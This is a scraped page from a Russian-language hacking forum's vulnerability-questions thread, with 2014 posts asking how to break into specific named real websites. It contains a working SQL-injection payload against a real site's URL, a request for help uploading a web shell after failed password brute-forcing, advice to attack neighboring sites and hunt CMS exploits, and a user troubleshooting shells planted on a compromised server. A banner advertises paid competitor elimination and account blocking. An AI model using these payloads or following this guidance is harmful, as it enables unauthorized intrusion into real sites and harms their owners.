УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2357 из 2438

2357

Опции темы

Поиск в этой теме

Опции просмотра

#23561

13.06.2014, 21:03

KSIVIT

Guest

Сообщений: n/a

Провел на форуме:
818

Репутация: -2

Цитата:

Сообщение от madhatter

madhatter said:
Давайте повангую. Есть /scripts/setup.php, но не /config/. До кучи /phpmyadmin/ + /pma/ по всем соседям, но плоентов нет. И да, по эту версию так и не нашлось ничего стоящего.

Есть такое: /config.inc.php/ но при открытии пишет только это ?> и да, setup есть

#23562

14.06.2014, 23:28

er9j6@

Guest

Сообщений: n/a

Провел на форуме:
107835

Репутация: 23

Как залить шелл, какой вариант? Пароли сбрутить не удалось

Код:

Code:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+

#23563

16.06.2014, 11:03

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от er9j6@

er9j6@ said:
Как залить шелл, какой вариант? Пароли сбрутить не удалось

Код:

Code:
http://fisher.spb.ru/news/message-bycatalog.php?category=2&water=-135+union+select+1,(select(@x)from(select(@x:=0x00),(select(null)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),3,4,5,6+--+

1. Исследование соседей.

2. Пошаманьте с /Club/contest/vne/forum/gallery/index.php?event=addform&gid=&se=-300154264

#23564

16.06.2014, 23:25

EksTasy

Познающий

Регистрация: 26.10.2008

Сообщений: 61

Провел на форуме:
478326

Репутация: 2

Отправить сообщение для EksTasy с помощью ICQ

Можно ли что-нибудь сделать? максимум чего добился - это ошибки в

Цитата:

Сообщение от None

var/www/architek/data/www/architek.spb.ru/modules/Xsl/Xsl.class.php

Цитата:

Сообщение от None

http://architek.spb.ru/ready_projects/?marking_of_goods=&project_name=&property_id_2=&pr operty_id_3=&floors=&property_id_13=&property_id_1 04_item_id_31=on&on_page=10&action=apply_filter

#23565

17.06.2014, 10:05

YaBtr

Guest

Сообщений: n/a

Провел на форуме:
132418

Репутация: 652

Цитата:

Сообщение от EksTasy

EksTasy said:
Можно ли что-нибудь сделать? максимум чего добился - это ошибки в

Сайт постороен на базе HostCMS. Ищите паблик эксплоиты, если не найдете- качайте исходники этой CMS (на сайте есть, правда с ограничением), и проводите анализ.

#23566

18.06.2014, 04:51

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

Провел на форуме:
5422

Репутация: 0

Интересует следующий вопрос:

1. Есть сайт site.com с шеллом на нём. Также, имеется доступ к серверу из под Root-а.

Проблема, конечно не совсем прямо относится к уязвимостям, но всё же, для проверки возможности редактирования файлов и правильности путей был выбран файл в корне x.php, содержание которого:

Код HTML:

HTML:

При изменении текста текста в print-е - ничего не происходит.

При изменении имени файла на x1.php - файл становится не доступен по адресу site.com/x.php и становится доступен по адресу site.com/x1.php, т.е. всё вроде бы нормально, но текст в x.php и x1.php всё равно один и тот же

Дело, навряд ли в корневом htaccess:

Код:

Code:
AddDefaultCharset UTF-8

#RewriteEngine on
#RewriteCond %{REQUEST_URI} !/1.html$
##RewriteCond %{REMOTE_HOST} !^888\.888\.888\.888
#RewriteRule $ /1.html [R=302,L]

# compress all text & html:
#AddOutputFilterByType DEFLATE text/html text/plain text/xml

RewriteEngine on

# Redirects to www. version
RewriteCond %{HTTP_HOST} ^site\.com [NC]
RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site\.com [NC]
RewriteRule ^(.*)$ http://www.site.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site1\.com [NC]
RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]

RewriteCond %{HTTP_HOST} ^site1\.com [NC]
RewriteRule ^(.*)$ http://www.site1.com/$1 [L,R=301]

# Send all requests except some to index.php
RewriteCond %{REQUEST_URI} !^/1/
RewriteCond %{REQUEST_URI} !^/2/
RewriteCond %{REQUEST_URI} !^/3/
RewriteCond %{REQUEST_URI} !^/4/
RewriteCond %{REQUEST_URI} !^/5/
RewriteRule ^(.+)$ index.php [L]

Order allow,deny
Allow from all

Deny from IP1
Deny from IP2

В чём может быть причина, если не в корневом хтаче?

В какую сторону копать?

#23567

18.06.2014, 05:53

Unknown

Guest

Сообщений: n/a

Провел на форуме:
114076

Репутация: 54

Aniweste, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.

#23568

18.06.2014, 11:55

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

Провел на форуме:
5422

Репутация: 0

Цитата:

Сообщение от madhatter

madhatter said:
Aniweste
, скорее всего, кеширование либо на сервере, либо на стороне клиента. Вопрос банальный, но кеш чистили? Попробуйте "приватный режим" или другой браузер. И попробуйте заменить .php на .txt.

Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша.

Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш?

В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть?

#23569

18.06.2014, 17:13

qaz

Guest

Сообщений: n/a

Провел на форуме:
344922

Репутация: 75

Цитата:

Сообщение от Aniweste

Aniweste said:
Спасибо за ответ. Кеширование точно не на стороне клиента. Пробовал и другой браузер и очистку кеша.
Тогда прошу помощи в доп. вопросе - если кеширование на стороне сервера, то где располагается кеш?
В корне сайта нету папок, в которых были бы кешированные страницы, тогда где они могли бы быть?

Клац

#23570

18.06.2014, 19:07

Aniweste

Новичок

Регистрация: 28.05.2010

Сообщений: 0

Провел на форуме:
5422

Репутация: 0

Скрипт сработал и повис на некоторое время сервак, но когда перезагрузился файлы откатились.

Искал-искал и так не понял - откуда они подгружаются.

Есть какие-нибудь идеи?

Так же скрипты из строки браузера не запускаются. Т.е. тупо не исполняются :O

Приходится использовать Execute: php 1.php

Вот.

А, ну и ещё одно. Как-то странно происходит процесс восстановления данных.

Обновляются файлы до каких-то непонятных времён, т.е. мой шелл восстанавливается из удалённых, а шеллы в других папках не восстанавливаются, но заливались все в одно и тоже время.

Заметил, что обновляются они по разному:

В одно время в .htaccess есть доп. строки

Код HTML:

HTML:

  Deny from all

  Deny from all

В другое время их нету

Страница 2357 из 2438

2357

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход